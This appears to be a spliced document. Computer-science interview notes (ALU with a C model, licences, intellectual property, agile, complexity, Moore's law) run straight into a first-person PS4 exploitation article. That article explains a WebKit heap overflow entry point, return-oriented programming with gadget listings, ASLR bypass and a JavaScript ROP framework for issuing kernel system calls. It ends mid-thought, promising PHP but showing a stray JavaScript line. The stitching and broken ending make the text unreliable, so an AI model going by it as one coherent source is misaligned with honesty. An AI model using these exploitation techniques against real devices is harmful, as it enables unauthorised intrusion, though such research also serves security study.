An arithmetic logic unit (ALU) is a digital electronic circuit that performs arithmetic and bitwise logical operations on integer binary numbers. This is in contrast to a floating-point unit (FPU), which operates on floating point numbers. An ALU is a fundamental building block of many types of computing circuits, including the central processing unit (CPU) of computers, FPUs, and graphics processing units (GPUs). A single CPU, FPU or GPU may contain multiple ALUs.
The inputs to an ALU are the data to be operated on, called operands, and a code indicating the operation to be performed; the ALU's output is the result of the performed operation. In many designs, the ALU also exchanges additional information with a status register, which relates to the result of the current or previous operations.
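A software model of a small 8-bit ALU shows the roles of the operands, the operation code and the status flags. The operation set, the `alu_out` structure and the flag conventions below are assumptions chosen for this sketch. Real ALUs differ in which operations and flags they provide.

```c
#include <stdint.h>

/* Hypothetical operation codes. */
typedef enum { ALU_ADD, ALU_SUB, ALU_AND, ALU_OR, ALU_XOR } alu_op;

typedef struct {
    uint8_t result;
    int     zero;    /* 1 if the result is zero */
    int     carry;   /* ADD: carry out of bit 7; SUB: borrow was needed */
} alu_out;

/* Perform the operation selected by op on the 8-bit operands a and b. */
alu_out alu(alu_op op, uint8_t a, uint8_t b)
{
    alu_out out = { 0, 0, 0 };
    unsigned wide = 0;   /* wider than 8 bits so the carry is visible */

    switch (op) {
    case ALU_ADD: wide = (unsigned)a + b; out.carry = wide > 0xFFu; break;
    case ALU_SUB: wide = (unsigned)a - b; out.carry = a < b;        break;
    case ALU_AND: wide = a & b; break;
    case ALU_OR:  wide = a | b; break;
    case ALU_XOR: wide = a ^ b; break;
    }
    out.result = (uint8_t)wide;   /* keep only the low 8 bits */
    out.zero = (out.result == 0);
    return out;
}
```

For example, adding 200 and 100 gives the 8-bit result 44 with the carry flag set, and subtracting 5 from 5 gives 0 with the zero flag set. These flags correspond to the information the ALU exchanges with the status register.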
What is floating-point unit?
A floating-point unit (FPU) is a part of a computer system specially designed to carry out operations on floating point numbers. Typical operations are addition, subtraction, multiplication, division, square root, and bitshifting. Some systems (particularly older, microcode-based architectures) can also perform various transcendental functions such as exponential or trigonometric calculations, though in most modern processors these are done with software library routines.
In general purpose computer architectures, one or more FPUs may be integrated with the central processing unit; however many embedded processors do not have hardware support for floating-point operations.
What is a cache?
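A cache is a small, fast storage area that keeps copies of recently or frequently used data, so that later requests for the same data can be served faster than from the original, slower source. A CPU cache holds copies of data from main memory close to the processor. The same idea is used in software: a web browser's cache (pronounced "cash") is a space on your computer's hard drive and in RAM where the browser saves copies of previously visited Web pages, using it like a short-term memory.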
What is a bus?
In computer architecture, a bus (related to the Latin "omnibus", meaning "for all") is a communication system that transfers data between components inside a computer, or between computers.
Publishing work
What are the major implications of MIT, BSD and GPL licenses?
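The MIT License is a permissive free software license originating at the Massachusetts Institute of Technology (MIT). The BSD licenses, originating from the Berkeley Software Distribution (BSD), are similarly permissive. Both allow the code to be used, modified and redistributed, including in proprietary software, as long as the copyright notice and license text are kept. The GPL (GNU General Public License) is a copyleft license: anyone who distributes the software or a derivative work must make it available under the GPL as well, including the source code.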
What are the differences between copyright, trademark, trade secret?
“Intellectual property is something that is created by the mind.” Typically, we think of ideas as being created by the mind – but intellectual property does not protect bare ideas: rather, it is the expression or symbolic power/recognizability of the ideas that are protected. Thus, it is the design of the rocket that is patented, not the idea of a rocket. It is the painting of the lake that is copyrighted, not the idea of a lake. And it is the consumer recognizable logo that is trademarked, not the idea of a logo. Intellectual property protects how we express and identify ideas in concrete ways – not the idea itself.
In particular:
Patents: protect functional expressions of an idea – not the idea itself. Machines, methods/processes, manufactures, compositions of matter, and improvements of any of these items can be patented. Thus, I can patent a design for the nozzle on a rocket, or the method of making the rocket, or the method of making the rocket fuel, or the metal in which the rocket fuel is stored, or a new way of transporting the rocket fuel to the rocket. But I cannot patent the broad “idea” of a rocket.
Copyrights: protect the specific creative expression of an idea through any medium of artistic/creative expression – i.e., paintings, photographs, sculpture, writings, software, etc. A copyright protects your painting of a haystack, but it would not prohibit another painter from expressing their artistry or viewpoint by also painting a haystack. Likewise, while Ian Fleming was able to receive a copyright on his particular expression of the idea of a secret agent (i.e., a debonair English secret agent), he could not prevent Rich Wilkes from receiving a copyright on his expression of the idea of a secret agent (i.e., a tattooed bald extreme athlete turned reluctant secret agent).
Trademarks: protect any symbol that indicates the source or origin of the goods or services to which it is affixed. While a trademark can be extremely valuable to its owner, the ultimate purpose of a trademark is to protect consumers – that is, the function of a trademark is to inform the consumer where the goods or services originate. The consumer, knowing the origin of the goods, can make purchasing decisions based on prior knowledge, reputation or marketing.
Trade secret: a formula, practice, process, design, instrument, pattern, commercial method, or compilation of information which is not generally known or reasonably ascertainable by others, and by which a business can obtain an economic advantage over competitors or customers.
While each category is distinct, a product (or components/aspects of a product) may fall into one or more of the categories. For example, software can be protected by both patents and copyrights. The copyright would protect the artistic expression of the idea – i.e., the code itself – while the patent would protect the functional expression of the idea – e.g., using a single click to purchase a book online. Likewise, it is likely that the software company will use a trademark to indicate who made the software.
An additional example would be a logo for a company. The logo may serve as a trademark indicating that all products affixed with the logo are from the same source. The creative and artistic aspects of the logo may also be protected by a copyright.
Where would you use waterfall software development model? Where would you use agile?
Waterfall is a sequential model, used to create different kinds of software, where project development is seen as flowing steadily downwards (like a waterfall) through the phases of software development: requirements analysis, UI design, software implementation, project verification and software maintenance. The process itself can be divided into different phases, depending on the IT project or other web development requirements. It suits projects where the requirements are well understood up front and unlikely to change.
Where would you use agile?
We want to use agile when we are doing something that is new, or at least new to the team building it. If it's something the team has done before over and over then the team probably doesn't need an agile approach.
To my mind, this is where some of the manufacturing analogies come in. If we are building the same car day after day, we learn pretty quickly all the nuances of building that car. We don't need an agile approach because the novelty of the situation is low. Novelty alone does not mean we should use an agile process.
What is the purpose of a version control system?
A version control system (also known as a Revision Control System) is a repository of files, often the files for the source code of computer programs, with monitored access. Every change made to the source is tracked, along with who made the change, why they made it, and references to problems fixed, or enhancements introduced, by the change.
Version control systems are essential for any form of distributed, collaborative development. Whether it is the history of a wiki page or large software development project, the ability to track each change as it was made, and to reverse changes when necessary can make all the difference between a well managed and controlled process and an uncontrolled ‘first come, first served’ system. It can also serve as a mechanism for due diligence for software projects.
What would you store in a version control system?
The main purpose of a version control system is to store a set of files, as well as the history of changes made to those files.[2] Exactly how each revision control system handles storing those changes, however, differs greatly: for instance, Subversion has in the past relied on a database instance and has since moved to storing its changes directly on the filesystem.[3] These differences in methodology have generally led to diverse uses of revision control by different groups, depending on their needs.
Algorithms and data structures
What is the time complexity of an algorithm?
In computer science, the time complexity of an algorithm quantifies the amount of time taken by an algorithm to run as a function of the length of the string representing the input. Time complexity is commonly estimated by counting the number of elementary operations performed by the algorithm, where an elementary operation takes a fixed amount of time to perform.
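As a rough illustration of counting elementary operations, the sketch below counts the comparisons made by a linear search and a binary search over the same sorted input. The function names and the 1024-element input are illustrative choices, not part of the original notes.

```javascript
// Count comparisons made while searching a sorted array for a target.
function linearSearchSteps(sorted, target) {
  let steps = 0;
  for (let i = 0; i < sorted.length; i++) {
    steps++; // one comparison per element visited
    if (sorted[i] === target) break;
  }
  return steps;
}

function binarySearchSteps(sorted, target) {
  let steps = 0;
  let low = 0;
  let high = sorted.length - 1;
  while (low <= high) {
    steps++; // one probe per halving of the remaining range
    const mid = (low + high) >> 1;
    if (sorted[mid] === target) break;
    if (sorted[mid] < target) low = mid + 1;
    else high = mid - 1;
  }
  return steps;
}

// Worst case for both searches: the target is the last element.
const input = Array.from({ length: 1024 }, (_, i) => i);
console.log(linearSearchSteps(input, 1023)); // 1024 comparisons: grows linearly with the input
console.log(binarySearchSteps(input, 1023)); // 11 probes: grows with log2 of the input
```

Doubling the input length doubles the first count but adds only one probe to the second, which is the difference between O(n) and O(log n).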
What is the space complexity of an algorithm?
Space complexity is a measure of the amount of working storage an algorithm needs. That means how much memory, in the worst case, is needed at any point in the algorithm. It represents the total amount of memory space that a "normal" physical computer would need to solve a given computational problem with a given algorithm.
What's a good algorithm?
It executes as fast as possible. It takes as little space as possible. It is adaptable to computers. It is simple. It is elegant (well written).
History
What is Moore's law? What is Rock's law?
Moore's law is the observation that the number of transistors in a dense integrated circuit doubles approximately every two years. The observation is named after Gordon E. Moore, the co-founder of Intel and Fairchild Semiconductor, whose 1965 paper described a doubling every year in the number of components per integrated circuit, and projected this rate of growth would continue for at least another decade. In 1975, looking forward to the next decade, he revised the forecast to doubling every two years. Rock's law or Moore's second law, named for Arthur Rock or Gordon Moore, says that the cost of a semiconductor chip fabrication plant doubles every four years. As of 2015, the price had already reached about 14 billion US dollars.
What were the major contributing factors for success of Microsoft, Apple, Google, <your favourite company>?
What were the major contributing factors to the success of Silicon Valley?
PS4
Introduction
Since there haven't been any major public announcements regarding PS4 hacking for a long time now, I wanted to explain a bit about how far PS4 hacking has come, and what is preventing further progression.
I will explain some security concepts that generally apply to all modern systems, and the discoveries that I have made from running ROP tests on my PS4.
If you are not particularly familiar with exploitation, you should read my article about exploiting DS games through stack smash vulnerabilities in save files first.
You may download my complete setup here to run these tests yourself; it is currently for firmware 1.76 only.
Background information about the PS4
As you probably know the PS4 features a custom AMD x86-64 CPU (8 cores), and there is a lot of research available for this CPU architecture, even if this specific version might deviate slightly from known standards. For example, PFLA (Page Fault Liberation Army) released a proof of concept implementing a complete Turing machine using only page faults and the x86 MMU during the 29C3 congress, check their awesome video over at YouTube. Also interesting if you are trying to run code within a virtual machine and want to execute instructions on the host CPU. - EurAsia news article 3251
As well as having a well documented CPU architecture, much of the software used in the PS4 is open source.
Most notably, the PS4's Orbis OS is based on FreeBSD, just like the PS3's OS was (with parts of NetBSD as well); but as well as FreeBSD 9.0, other notable software used includes Mono VM, and WebKit.
WebKit entry point
WebKit is the open source layout engine which renders web pages in the browsers for iOS, Wii U, 3DS, PS Vita, and the PS4.
Although so widely used and mature, WebKit does have its share of vulnerabilities; you can learn about most of them by reading Pwn2Own write-ups.
In particular, the browser in PS4 firmware 1.76 uses a version of WebKit which is vulnerable to CVE-2012-3748, a heap-based buffer overflow in the JSArray::sort(...) method.
In 2014, nas and Proxima announced that they had successfully been able to port this exploit to the PS4's browser, and released the PoC code publicly as the first entry point into hacking the PS4.
This gives us arbitrary read and write access to everything the WebKit process can read and write to, which can be used to dump modules, and overwrite return addresses on the stack, letting us control the Program Counter (for ROP).
Since then, many other vulnerabilities have been found in WebKit, which could probably allow for module dumping and ROP on later firmwares of the PS4, but as of writing, no one has ported any of these exploits to the PS4 publicly.
What is ROP?
Unlike in primitive devices like the DS, the PS4 has a kernel which controls the properties of different areas of memory. Pages of memory which are marked as executable cannot be overwritten, and pages of memory which are marked as writable cannot be executed; this is known as Data Execution Prevention (DEP).
This means that we can't just copy a payload into memory and execute it. However, we can execute code that is already loaded into memory and marked as executable.
It wouldn't be very useful to jump to a single address if we can't write our own code to that address, so we use ROP.
Return-Oriented Programming (ROP) is just an extension to traditional stack smashing, but instead of overwriting only a single value which the PC will jump to, we can chain together many different addresses, known as gadgets.
A gadget is usually just a single desired instruction followed by a ret.
In x86_64 assembly, when a ret instruction is reached, a 64bit value is popped off the stack and the PC jumps to it; since we can control the stack, we can make every ret instruction jump to the next desired gadget.
For example, memory from 0x80000 may contain the instructions:

    mov rax, 0
    ret

And memory from 0x90000 may contain the instructions:

    mov rbx, 0
    ret

If we overwrite a return address on the stack to contain 0x80000 followed by 0x90000, then as soon as the first ret instruction is reached execution will jump to mov rax, 0, and immediately afterwards, the next ret instruction will pop 0x90000 off the stack and jump to mov rbx, 0.
Effectively this chain will set both rax and rbx to 0, just as if we had written the code into a single location and executed it from there.
ROP chains aren't just limited to a list of addresses though; assuming that memory from 0xa0000 contains these instructions:

    pop rax
    ret

We can set the first item in the chain to 0xa0000 and the next item to any desired value for rax.
Gadgets also don't have to end in a ret instruction; we can use gadgets ending in a jmp:

    add rax, 8
    jmp rcx

By making rcx point to a ret instruction, the chain will continue as normal:

    chain.add("pop rcx", "ret");
    chain.add("add rax, 8; jmp rcx");

Sometimes you won't be able to find the exact gadget that you need on its own, but only with other instructions after it. For example, if you want to set r8 to something, but only have this gadget, you will have to set r9 to some dummy value:

    pop r8
    pop r9
    ret

Although you may have to be creative with how you write ROP chains, it is generally accepted that within a sufficiently large code dump, there will be enough gadgets for Turing-complete functionality; this makes ROP a viable method of bypassing DEP.
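To make the mechanics concrete, here is a toy simulation of a ROP chain in plain JavaScript. It is only a model: the gadget table, the cpu object, and runChain are hypothetical names, and nothing here touches real memory. Each gadget is assumed to end in a ret, which is modelled as popping the next address off the controlled stack.

```javascript
// Toy model: "memory" maps addresses to gadgets. Every gadget implicitly ends
// with ret, which pops the next address from the attacker-controlled stack.
const gadgets = {
  0x80000: (cpu) => { cpu.rax = 0; },                    // mov rax, 0 ; ret
  0x90000: (cpu) => { cpu.rbx = 0; },                    // mov rbx, 0 ; ret
  0xa0000: (cpu, stack) => { cpu.rax = stack.shift(); }  // pop rax ; ret
};

function runChain(chain, cpu) {
  const stack = chain.slice(); // index 0 is the top of the stack
  while (stack.length > 0) {
    const address = stack.shift(); // what ret does: pop a value and jump to it
    const gadget = gadgets[address];
    if (!gadget) throw new Error("segfault at 0x" + address.toString(16));
    gadget(cpu, stack);
  }
  return cpu;
}

// Zero rax and rbx, then load an arbitrary value into rax with pop rax.
const cpu = runChain([0x80000, 0x90000, 0xa0000, 0x1234], { rax: 7, rbx: 7 });
console.log(cpu.rax.toString(16), cpu.rbx); // 1234 0
```

Note how the value 0x1234 sits in the chain right after the address of the pop rax gadget: the gadget consumes it as data, so it is never treated as a return address.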
Finding gadgets
Think of ROP as writing a new chapter to a book, using only words that have appeared at the end of sentences in the previous chapters.
It's obvious from the structure of most sentences that we probably won't be able to find words like 'and' or 'but' appearing at the end of any sentences, but we will need these connectives in order to write anything meaningful.
It is quite possible however, that a sentence has ended with 'sand'. Although the author only ever intended for the word to be read from the 's', if we start reading from the 'a', it will appear as an entirely different word by coincidence, 'and'.
These principles also apply to ROP.
The structure of almost all functions follows something like this:

- Save registers

    push rbp
    mov rbp, rsp
    push r15
    push r14
    push r13
    push r12
    push rbx
    sub rsp, 18h

- Function body
- Restore registers

    add rsp, 18h
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15
    pop rbp
    ret

So you'd expect to only be able to find pop gadgets, or more rarely, something like xor rax, rax to set the return value to 0 before returning.
Having a comparison like:

    cmp [rax], r12
    ret

wouldn't make any sense since the result of the comparison isn't used by the function. However, there is still a possibility that we can find gadgets like these.
x86_64 instructions are similar to words in that they have variable lengths, and can mean something entirely different depending on where decoding starts.
The x86_64 architecture is a variable-length CISC instruction set. Return-oriented programming on the x86_64 takes advantage of the fact that the instruction set is very "dense", that is, any random sequence of bytes is likely to be interpretable as some valid set of x86_64 instructions. - Wikipedia
To demonstrate this, take a look at the end of this function from the WebKit module:
    000000000052BE0D mov eax, [rdx+8]
    000000000052BE10 mov [rsi+10h], eax
    000000000052BE13 or byte ptr [rsi+39h], 20h
    000000000052BE17 ret

Now take a look at what the code looks like if we start decoding from 0x52be14:

    000000000052BE14 cmp [rax], r12
    000000000052BE17 ret

Even though this code was never intended to be executed, it is within an area of memory which has been marked as executable, so it is perfectly valid to use as a gadget.
Of course, it would be incredibly time consuming to manually look at every possible way of interpreting the code before every single ret instruction; that's why tools exist to do this for you. The one which I use to search for ROP gadgets is rp++; to generate a text file filled with gadgets, just use:
rp-win-x64 -f mod14.bin --raw=x64 --rop=1 --unique > mod14.txt
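As a very rough sketch of the first step such a tool performs, the snippet below finds every ret byte (0xc3) and lists each possible start address in the few bytes before it. The byte values are my own hand encoding of the WebKit listing shown earlier, so treat them as an assumption rather than a real dump. A real tool like rp++ also decodes each candidate to check that it is a valid instruction sequence, which this sketch does not do.

```javascript
// Assumed encoding of the function tail at 0x52BE0D (not taken from a dump).
const BASE = 0x52be0d;
const code = Uint8Array.from([
  0x8b, 0x42, 0x08,       // mov eax, [rdx+8]
  0x89, 0x46, 0x10,       // mov [rsi+10h], eax
  0x80, 0x4e, 0x39, 0x20, // or byte ptr [rsi+39h], 20h
  0xc3                    // ret
]);

// For every ret byte, list each start address up to maxLength bytes before it.
function candidateGadgets(bytes, base, maxLength) {
  const candidates = [];
  for (let end = 0; end < bytes.length; end++) {
    if (bytes[end] !== 0xc3) continue;
    for (let start = Math.max(0, end - maxLength); start < end; start++) {
      candidates.push({
        address: base + start,
        bytes: Array.from(bytes.slice(start, end + 1))
      });
    }
  }
  return candidates;
}

const candidates = candidateGadgets(code, BASE, 3);
for (const c of candidates) {
  console.log(c.address.toString(16), c.bytes.map((b) => b.toString(16)).join(" "));
}
```

The first candidate starts at 0x52be14 with the bytes 4e 39 20 c3, which is the unintended cmp [rax], r12 followed by ret from the listing above.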
Segmentation faults
If we do try to execute a non-executable page of memory, or try to write to a non-writable page of memory, a segmentation fault will occur.
For example, trying to execute code on the stack, which is mapped as read and write only:

    setU8to(chain.data + 0, 0xeb);
    setU8to(chain.data + 1, 0xfe);

    chain.add(chain.data);

And trying to write to code, which is mapped as read and execute only:

    setU8to(moduleBases[webkit], 0);

If a segmentation fault occurs, a message saying "There is not enough free system memory" will appear, and the page will fail to load.
There are other possible reasons for this message to be displayed, such as executing an invalid instruction or an unimplemented system call, but a segmentation fault is the most common.
ASLR
Address Space Layout Randomization (ASLR) is a security technique which causes the base addresses of modules to be different every time you start the PS4.
It has been reported to me that very old firmwares (1.05) don't have ASLR enabled, but it was introduced sometime before firmware 1.70. Note that kernel ASLR is not enabled (for firmwares 1.76 and lower at least), which will be proved later in the article.
For most exploits ASLR would be a problem because if you don't know the addresses of the gadgets in memory, you would have no idea what to write to the stack.
Luckily for us, we aren't limited to just writing static ROP chains. We can use JavaScript to read the modules table, which will tell us the base addresses of all loaded modules. Using these bases, we can then calculate the addresses of all our gadgets before we trigger ROP execution, bypassing ASLR.
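The address calculation itself is simple addition. The sketch below shows the idea with made-up numbers: the base addresses and gadget offsets are hypothetical placeholders, and in a real chain the bases would be read from the modules table at runtime.

```javascript
// Hypothetical per-boot base addresses, as they might be read from the modules table.
const moduleBases = { webkit: 0x820000000, libkernel: 0x810000000 };

// Hypothetical offsets of gadgets inside each module dump; these never change
// for a given firmware, only the base they are added to does.
const gadgetOffsets = {
  "pop rax": { module: "webkit", offset: 0x1c6ab },
  "pop rdi": { module: "webkit", offset: 0x11ad0 },
  "syscall": { module: "libkernel", offset: 0xdb7a }
};

// Resolve a gadget name to its absolute address for this boot.
function resolveGadget(name, bases) {
  const gadget = gadgetOffsets[name];
  if (!gadget) throw new Error("unknown gadget: " + name);
  return bases[gadget.module] + gadget.offset;
}

console.log(resolveGadget("pop rax", moduleBases).toString(16)); // 82001c6ab
```

Because the offsets are fixed and only the bases are randomised, the same chain description works on every boot once the bases have been read.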
The modules table also includes the filenames of the modules:
    WebProcess.self
    libkernel.sprx
    libSceLibcInternal.sprx
    libSceSysmodule.sprx
    libSceNet.sprx
    libSceNetCtl.sprx
    libSceIpmi.sprx
    libSceMbus.sprx
    libSceRegMgr.sprx
    libSceRtc.sprx
    libScePad.sprx
    libSceVideoOut.sprx
    libScePigletv2VSH.sprx
    libSceOrbisCompat.sprx
    libSceWebKit2.sprx
    libSceSysCore.sprx
    libSceSsl.sprx
    libSceVideoCoreServerInterface.sprx
    libSceSystemService.sprx
    libSceCompositeExt.sprx

Although the PS4 predominantly uses the [Signed] PPU Relocatable Executable ([S]PRX) format for modules, some string references to [Signed] Executable and Linking Format ([S]ELF) object files can also be found in the libSceSysmodule.sprx dump, such as bdj.elf, web_core.elf and orbis-jsc-compiler.self. This combination of modules and objects is similar to what is used in the PSP and PS3.
You can view a complete list of all modules available (not just those loaded by the browser) in libSceSysmodule.sprx. We can load and dump some of these through several of Sony's custom system calls, which will be explained later in this article.
JuSt-ROP
Using JavaScript to write and execute dynamic ROP chains gives us a tremendous advantage over a standard buffer overflow attack.
As well as bypassing ASLR, we can also read the user agent of the browser, and provide a different ROP chain for different browser versions, giving our exploit the highest compatibility possible.
We can even use JavaScript to read the memory at our gadgets' addresses to check that they are correct, giving us almost perfect reliability.
Writing ROP chains dynamically, rather than generating them with a script beforehand, just makes sense.
I created a JavaScript framework for writing ROP chains, JuSt-ROP, for this very reason.
JavaScript caveats
JavaScript represents numbers using the IEEE-754 double-precision (64bit) format. This provides us with 53bit precision, meaning that it isn't possible to represent every 64bit value; approximations will have to be used for some.
If you just need to set a 64bit value to something low, like 256, then setU64to will be fine.
But for situations in which you need to write a buffer or struct of data, there is the possibility that certain bytes will be written incorrectly if it has been written in 64bit chunks.
Instead, you should write data in 32bit chunks (remembering that the PS4 is little endian), to ensure that every byte is exact.
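The following sketch demonstrates both points on a PC rather than on the console. It uses a standard DataView as a stand-in for the article's memory helpers, and writeU64AsHalves is a hypothetical name.

```javascript
// 2^53 + 1 has no exact double representation, so it rounds to 2^53.
const precisionLost = (2 ** 53 + 1 === 2 ** 53);
console.log(precisionLost); // true

// Write a 64-bit value as two exact 32-bit halves.
// Little endian means the low half goes at the lower address.
function writeU64AsHalves(view, offset, high32, low32) {
  view.setUint32(offset, low32, true);
  view.setUint32(offset + 4, high32, true);
}

const buffer = new ArrayBuffer(8);
writeU64AsHalves(new DataView(buffer), 0, 0xdeadbeef, 0xcafebabe);

// Resulting bytes in memory order: be ba fe ca ef be ad de
const written = Array.from(new Uint8Array(buffer), (b) => b.toString(16));
console.log(written.join(" "));
```

Passing the value 0xdeadbeefcafebabe as a single number would not work, because it needs more than 53 bits of precision and its low bits would be rounded away.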
System calls
Interestingly, the PS4 uses the same calling convention as Linux and MS-DOS for system calls, with arguments stored in registers, rather than the traditional UNIX way (which FreeBSD uses by default), with arguments stored in the stack:
    rax - System call number
    rdi - Argument 1
    rsi - Argument 2
    rdx - Argument 3
    r10 - Argument 4
    r8 - Argument 5
    r9 - Argument 6

We can try to perform any system call with the following JuSt-ROP method:

    this.syscall = function(name, systemCallNumber, arg1, arg2, arg3, arg4, arg5, arg6) {
        console.log("syscall " + name);

        this.add("pop rax", systemCallNumber);
        if(typeof(arg1) !== "undefined") this.add("pop rdi", arg1);
        if(typeof(arg2) !== "undefined") this.add("pop rsi", arg2);
        if(typeof(arg3) !== "undefined") this.add("pop rdx", arg3);
        if(typeof(arg4) !== "undefined") this.add("pop rcx", arg4);
        if(typeof(arg5) !== "undefined") this.add("pop r8", arg5);
        if(typeof(arg6) !== "undefined") this.add("pop r9", arg6);
        this.add("mov r10, rcx; syscall");
    }

Just make sure to set the stack base to some free memory beforehand:

    this.add("pop rbp", stackBase + returnAddress + 0x1400);

Using system calls can tell us a huge amount about the PS4 kernel. Not only that, but using system calls is most likely the only way that we can interact with the kernel, and thus potentially trigger a kernel exploit.
If you are reverse engineering modules to identify some of Sony's custom system calls, you may come across an alternative calling convention:
Sometimes Sony performs system calls through regular system call 0 (which usually does nothing in FreeBSD), with the first argument (rdi) controlling which system call should be executed:

    rax - 0
    rdi - System call number
    rsi - Argument 1
    rdx - Argument 2
    r10 - Argument 3
    r8 - Argument 4
    r9 - Argument 5

It is likely that Sony did this to have easy compatibility with the function calling convention. For example:

    .global syscall
    syscall:
        xor rax, rax
        mov r10, rcx
        syscall
        ret

Using this, they can perform system calls from C using the function calling convention:

    int syscall();

    int getpid(void) {
        return syscall(20);
    }

When writing ROP chains, we can use either convention:

    // Both will get the current process ID:
    chain.syscall("getpid", 20);
    chain.syscall("getpid", 0, 20);

It's good to be aware of this, because we can use whichever one is more convenient for the gadgets that are available.
getpid
Just by using system call 20, getpid(void), we can learn a lot about the kernel.
The very fact that this system call works at all tells us that Sony didn't bother mixing up the system call numbers as a means of security through obscurity (under the BSD license they could have done this without releasing the new system call numbers).
So, we automatically have a list of system calls in the PS4 kernel to try.
Secondly, by calling getpid(), restarting the browser, and calling it again, we get a return value 2 higher than the previous value.
This tells us that the Internet Browser app actually consists of 2 separate processes: the WebKit core (which we take over), that handles parsing HTML and CSS, decoding images, and executing JavaScript for example, and another one to handle everything else: displaying graphics, receiving controller input, managing history and bookmarks, etc.
Also, although FreeBSD has supported PID randomisation since 4.0, sequential PID allocation is the default behaviour.
The fact that PID allocation is set to the default behaviour indicates that Sony likely didn't bother adding any additional security enhancements such as those encouraged by projects like HardenedBSD.
How many custom system calls are there?
The last standard FreeBSD 9 system call is wait6, number 532; anything higher than this must be a custom Sony system call.
Invoking most of Sony's custom system calls without the correct arguments will return error 0x16, "Invalid argument"; however, any compatibility or unimplemented system calls will report the "There is not enough free system memory" error.
Through trial and error, I have found that system call number 617 is the last Sony system call; anything higher is unimplemented.
From this, we can conclude that there are 85 custom Sony system calls in the PS4's kernel (617 - 532).
This is significantly fewer than the PS3, which had almost 1000 system calls in total. This indicates that we have fewer possible attack vectors, but that it may be easier to document all of the system calls.
Furthermore, 9 of these 85 system calls always return 0x4e, ENOSYS, which suggests that they may only be callable from development units, leaving us with just 76 which are usable.
Of these 76, only 45 are referenced by libkernel.sprx (which all non-core applications use to perform system calls), so developers only have 45 custom system calls which they can use.
Interestingly, although only 45 are intended to be called (because libkernel.sprx has wrappers for them), some of the other 31 are still callable from the Internet Browser process. It is more likely for these unintended system calls to have vulnerabilities in them, since they have probably had the least amount of testing.
libkernel.sprx
To identify how custom system calls are used by libkernel, you must first remember that it is just a modification of the standard FreeBSD 9.0 libraries.
Here's an extract of _libpthread_init from thr_init.c:
    /*
     * Check for the special case of this process running as
     * or in place of init as pid = 1:
     */
    if ((_thr_pid = getpid()) == 1) {
        /*
         * Setup a new session for this process which is
         * assumed to be running as root.
         */
        if (setsid() == -1)
            PANIC("Can't set session ID");
        if (revoke(_PATH_CONSOLE) != 0)
            PANIC("Can't revoke console");
        if ((fd = __sys_open(_PATH_CONSOLE, O_RDWR)) < 0)
            PANIC("Can't open console");
        if (setlogin("root") == -1)
            PANIC("Can't set login to root");
        if (_ioctl(fd, TIOCSCTTY, (char *) NULL) == -1)
            PANIC("Can't set controlling terminal");
    }

The same function can be found at offset 0x215F0 from libkernel.sprx. This is how the above extract looks from within a libkernel dump:

    call getpid
    mov cs:dword_5B638, eax
    cmp eax, 1
    jnz short loc_2169F

    call setsid
    cmp eax, 0FFFFFFFFh
    jz loc_21A0C

    lea rdi, aDevConsole ; "/dev/console"
    call revoke
    test eax, eax
    jnz loc_21A24

    lea rdi, aDevConsole ; "/dev/console"
    mov esi, 2
    xor al, al
    call open

    mov r14d, eax
    test r14d, r14d
    js loc_21A3C
    lea rdi, aRoot ; "root"
    call setlogin
    cmp eax, 0FFFFFFFFh
    jz loc_21A54

    mov edi, r14d
    mov esi, 20007461h
    xor edx, edx
    xor al, al
    call ioctl
    cmp eax, 0FFFFFFFFh
    jz loc_21A6C
Reversing module dumps to analyse system calls
libkernel isn't completely open source though; there's also a lot of custom code which can help disclose some of Sony's system calls.
This process will vary depending on the system call you are looking up, but for some it is fairly easy to get a basic understanding of the arguments that are passed to it.
The system call wrapper will be declared somewhere in libkernel.sprx, and will almost always follow this template:
    000000000000DB70 syscall_601 proc near
    000000000000DB70 mov rax, 259h
    000000000000DB77 mov r10, rcx
    000000000000DB7A syscall
    000000000000DB7C jb short error
    000000000000DB7E retn
    000000000000DB7F
    000000000000DB7F error:
    000000000000DB7F lea rcx, sub_DF60
    000000000000DB86 jmp rcx
    000000000000DB86 syscall_601 endp

Note that the mov r10, rcx instruction doesn't necessarily mean that the system call takes at least 4 arguments; all system call wrappers have it, even those that take no arguments, such as getpid.
Once you've found the wrapper, you can look up xrefs to it:
    0000000000011D50 mov edi, 10h
    0000000000011D55 xor esi, esi
    0000000000011D57 mov edx, 1
    0000000000011D5C call syscall_601
    0000000000011D61 test eax, eax
    0000000000011D63 jz short loc_11D6A

It's good to look up several of these, just to make sure that the registers weren't modified for something unrelated:

    0000000000011A28 mov edi, 9
    0000000000011A2D xor esi, esi
    0000000000011A2F xor edx, edx
    0000000000011A31 call syscall_601
    0000000000011A36 test eax, eax
    0000000000011A38 jz short loc_11A3F

Consistently, the first three registers of the system call convention (rdi, rsi, and rdx) are modified before invoking the call, so we can conclude with reasonable confidence that it takes 3 arguments.
For clarity, this is how we would replicate the calls in JuSt-ROP:
    chain.syscall("unknown", 601, 0x10, 0, 1);
    chain.syscall("unknown", 601, 9, 0, 0);

As with most system calls, it will return 0 on success, as seen by the jz conditional after testing the return value.
Looking up anything beyond the number of arguments will require a much more in-depth analysis of the code before and after the call to understand the context, but this should help you get started.
Brute forcing system calls
Although reverse engineering module dumps is the most reliable way to identify system calls, some aren't referenced at all in the dumps we have so we will need to analyse them blindly.
If we guess that a certain system call might take a particular set of arguments, we can brute force all system calls which return a certain value (0 for success) with the arguments that we chose, and ignore all which returned an error.
We can also pass 0s for all arguments, and brute force all system calls which return useful errors such as 0xe, "Bad address", which would indicate that they take at least one pointer.
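When sifting through brute force results it helps to turn raw return values into names. The sketch below covers only the FreeBSD errno values that appear in this article; describeReturn and ERRNO_NAMES are hypothetical helper names, not part of JuSt-ROP.

```javascript
// FreeBSD errno values mentioned in this article.
const ERRNO_NAMES = {
  0x0e: "EFAULT",        // "Bad address"
  0x16: "EINVAL",        // "Invalid argument"
  0x3f: "ENAMETOOLONG",  // "File name too long"
  0x4e: "ENOSYS"         // "Function not implemented"
};

// Turn a raw system call return value into a short label for logging.
function describeReturn(value) {
  if (value === 0) return "success";
  if (ERRNO_NAMES[value]) return ERRNO_NAMES[value];
  return "other (0x" + value.toString(16) + ")";
}

console.log(describeReturn(0x0e)); // EFAULT: the call probably expects a pointer
console.log(describeReturn(0x64)); // other (0x64): possibly an allocated identifier
```

A value that is neither 0 nor a known error is worth a closer look, since it may be a handle or descriptor rather than a failure code.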
Firstly, we will need to execute the ROP chain as soon as the page loads. We can do this by attaching our function to the body element's onload:
    <body onload="exploit()">

Next we will need to perform a specific system call depending on an HTTP GET value. Although this can be done with JavaScript, I will demonstrate how to do this using PHP for simplicity:

    var Sony = 533;
